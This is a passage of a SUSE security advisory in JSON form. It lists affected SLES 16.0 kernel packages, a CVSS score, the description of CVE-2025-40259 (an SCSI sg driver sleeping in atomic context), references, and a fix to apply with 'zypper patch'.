"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-40257"
},
{
"cve": "CVE-2025-40259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: sg: Do not sleep in atomic context\n\nsg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may\nsleep. Hence, call sg_finish_rem_req() with interrupts enabled instead\nof disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40259",
"url": "https://www.suse.com/security/cve/CVE-2025-40259"
},
{
"category": "external",
"summary": "SUSE Bug 1254845 for CVE-2025-40259",
"url": "https://bugzilla.suse.com/1254845"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
